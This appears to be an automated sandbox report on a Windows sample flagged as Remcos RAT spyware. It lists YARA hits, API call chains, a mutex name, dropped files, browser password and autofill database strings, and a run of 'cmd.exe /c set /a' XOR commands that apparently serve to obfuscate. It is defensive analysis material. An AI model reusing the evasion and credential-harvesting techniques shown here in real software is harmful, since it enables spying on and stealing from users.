              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,132_2_00406DFC
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,132_2_00406E9F
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,133_2_004068B5
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,133_2_004072B5

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 00000082.00000003.21793249809.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26258711325.000000000019F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947103754.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269649402.000000000525D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793249809.0000000005256000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21784839401.00000000052BF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000002.26269787785.00000000052BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.00000000052AC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947522575.0000000005259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947642663.000000000525C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21793113422.00000000052B3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21947260967.0000000005248000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21785310662.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000082.00000003.21777083214.0000000005255000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: asXlZG3aW6.exe PID: 4464, type: MEMORYSTR
              Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
              Source: Conhost.exeProcess created: 99

              System Summary

              barindex
              Submitted sample is a known malware sample
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeDropped file: MD5: b38561661a7164e3bbb04edc3718fe89 Family: Chafer Alias: APT39, Chafer Description: Chafers (also known as APT39) focus on the telecommunications and travel industries suggests intent to perform monitoring, tracking, or surveillance operations against specific individuals. While its targeting scope is global, the activities are concentrated in the Middle East. Government entities targeting suggests a potential secondary intent to collect geopolitical data that may benefit nation-state decision making. References: https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html https://mp.weixin.qq.com/s/c2z4laJ0oq5y0BAEFM3Y9wData Source: https://github.com/RedDrip7/APT_Digital_Weapon
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess Stats: CPU usage > 6%
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,131_2_0040DD85
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00401806 NtdllDefWindowProc_W,131_2_00401806
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_004018C0 NtdllDefWindowProc_W,131_2_004018C0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004016FD NtdllDefWindowProc_A,132_2_004016FD
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004017B7 NtdllDefWindowProc_A,132_2_004017B7
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00402CAC NtdllDefWindowProc_A,133_2_00402CAC
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00402D66 NtdllDefWindowProc_A,133_2_00402D66
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,130_2_004031F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Windows\resources\0409Jump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004067420_2_00406742
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_00404A090_2_00404A09
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_00406F190_2_00406F19
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_00406742130_2_00406742
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_00404A09130_2_00404A09
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_00406F19130_2_00406F19
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367BB5C1130_2_367BB5C1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_367C7194130_2_367C7194
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00406E8F131_2_00406E8F
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044B040131_2_0044B040
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0043610D131_2_0043610D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00447310131_2_00447310
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044A490131_2_0044A490
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040755A131_2_0040755A
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0043C560131_2_0043C560
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044B610131_2_0044B610
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044D6C0131_2_0044D6C0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_004476F0131_2_004476F0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044B870131_2_0044B870
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044081D131_2_0044081D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00414957131_2_00414957
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_004079EE131_2_004079EE
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00407AEB131_2_00407AEB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044AA80131_2_0044AA80
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00412AA9131_2_00412AA9
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00404B74131_2_00404B74
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00404B03131_2_00404B03
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0044BBD8131_2_0044BBD8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00404BE5131_2_00404BE5
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00404C76131_2_00404C76
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00415CFE131_2_00415CFE
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00416D72131_2_00416D72
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00446D30131_2_00446D30
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00446D8B131_2_00446D8B
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00405038132_2_00405038
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0041208C132_2_0041208C
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004050A9132_2_004050A9
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0040511A132_2_0040511A
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0043C13A132_2_0043C13A
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004051AB132_2_004051AB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00449300132_2_00449300
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0040D322132_2_0040D322
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044A4F0132_2_0044A4F0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0043A5AB132_2_0043A5AB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00413631132_2_00413631
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00446690132_2_00446690
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044A730132_2_0044A730
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004398D8132_2_004398D8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_004498E0132_2_004498E0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0044A886132_2_0044A886
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0043DA09132_2_0043DA09
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00438D5E132_2_00438D5E
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00449ED0132_2_00449ED0
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_0041FE83132_2_0041FE83
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 132_2_00430F54132_2_00430F54
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004050C2133_2_004050C2
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004014AB133_2_004014AB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00405133133_2_00405133
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004051A4133_2_004051A4
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00401246133_2_00401246
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_0040CA46133_2_0040CA46
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00405235133_2_00405235
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004032C8133_2_004032C8
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_004222D9133_2_004222D9
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00401689133_2_00401689
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00402F60133_2_00402F60
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 004169A7 appears 87 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 0044DB70 appears 41 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 004165FF appears 35 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00402AC1 appears 48 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00422297 appears 42 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00444B5A appears 37 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00413025 appears 79 times
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: String function: 00416760 appears 69 times
              Source: asXlZG3aW6.exeStatic PE information: invalid certificate
              Source: asXlZG3aW6.exe, 00000000.00000002.21759561342.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000082.00000000.21570016074.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000082.00000003.21794019954.00000000052CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000082.00000003.21827014519.00000000052AF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000082.00000002.26280391623.000000003679B000.00000040.10000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exeBinary or memory string: OriginalFileName vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000083.00000000.21794403943.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000084.00000000.21794732747.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exeBinary or memory string: OriginalFilename vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000085.00000002.21797217468.000000000041B000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenamemspass.exe8 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exe, 00000085.00000000.21795080472.0000000000442000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exeBinary or memory string: OriginalFilenamebageblandinger.exe2 vs asXlZG3aW6.exe
              Source: asXlZG3aW6.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
              Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@405/13@3/3
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_004182CE GetLastError,FormatMessageW,FormatMessageA,LocalFree,free,131_2_004182CE
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 130_2_004031F1 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,LdrInitializeThunk,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LdrInitializeThunk,LookupPrivilegeValueA,AdjustTokenPrivileges,LdrInitializeThunk,ExitWindowsEx,ExitProcess,130_2_004031F1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 133_2_00410DE1 GetCurrentProcess,GetLastError,GetProcAddress,GetProcAddress,LookupPrivilegeValueA,GetProcAddress,AdjustTokenPrivileges,CloseHandle,133_2_00410DE1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_00404496 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404496
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_00413D4C CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,CloseHandle,free,Process32NextW,CloseHandle,131_2_00413D4C
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 0_2_004020CB CoCreateInstance,MultiByteToWideChar,0_2_004020CB
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeCode function: 131_2_0040B58D GetModuleHandleW,FindResourceW,LoadResource,SizeofResource,LockResource,memcpy,131_2_0040B58D
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Users\user\AppData\Local\injektionen.iniJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-13IBN7
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile created: C:\Users\user\AppData\Local\Temp\nsz32C5.tmpJump to behavior
              Source: asXlZG3aW6.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeSystem information queried: HandleInformation
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile read: C:\Users\desktop.iniJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000084.00000002.21795504727.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
              Source: asXlZG3aW6.exe, 00000082.00000002.26279946658.0000000035E20000.00000040.10000000.00040000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
              Source: asXlZG3aW6.exe, 00000083.00000003.21824606122.0000000002A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
              Source: asXlZG3aW6.exe, 00000083.00000002.21828314520.0000000002A82000.00000004.00000020.00020000.00000000.sdmp, asXlZG3aW6.exe, 00000083.00000003.21825693495.0000000002A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: asXlZG3aW6.exe, asXlZG3aW6.exe, 00000083.00000002.21827033751.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
              Source: asXlZG3aW6.exe, 00000083.00000003.21822817557.0000000002A81000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;
              Source: asXlZG3aW6.exeReversingLabs: Detection: 55%
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeFile read: C:\Users\user\Desktop\asXlZG3aW6.exeJump to behavior
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_132-33208
              Source: unknownProcess created: C:\Users\user\Desktop\asXlZG3aW6.exe "C:\Users\user\Desktop\asXlZG3aW6.exe"
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "250^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "227^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "255^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "244^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "253^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "130^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "131^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "139^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "242^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "195^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "208^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "197^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "212^177"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\asXlZG3aW6.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /a "247^177"
